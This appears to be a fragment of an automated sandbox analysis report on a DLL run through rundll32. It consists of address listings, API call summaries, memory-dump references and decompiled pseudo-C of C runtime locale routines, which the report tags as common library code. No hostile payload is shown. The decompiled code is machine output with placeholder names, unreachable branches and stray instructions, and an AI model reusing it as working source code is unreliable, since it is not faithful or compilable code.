                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F0E4
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F0EE
                          • int.LIBCPMT ref: 6E20F105
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20F128
                          • std::_Facet_Register.LIBCPMT ref: 6E20F13F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F15F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F17D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: (k,n
                          • API String ID: 1394824916-2474335229
                          • Opcode ID: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction ID: 0c45d773f348144a53aee096c385ca3720259a60b4694af22e905baab13ee6b9
                          • Opcode Fuzzy Hash: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction Fuzzy Hash: 7011C67591052DDBCF01EBE4C894AEEB7BBAF45B15F240908E510AB3D0DB749A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E24E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E24D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E24DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E24F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2491A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E242188();
									asm("int3");
									_t171 =  *0x6e2c76f0; // 0x2c047d8
									 *0x6e2c5108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2c51c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2c51ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E24DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E256102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e270ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E221C3C( &_v528,  *0x6e2c51e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e270de8; // 0x6e20815c
									 *0x6e26a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2c52b0;
										if(_t233 != 0x6e2c52b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E24CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E24CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E24CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E24CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E24CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E21F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

























































                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9f6
                          0x6e24e9f6
                          0x00000000

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D677
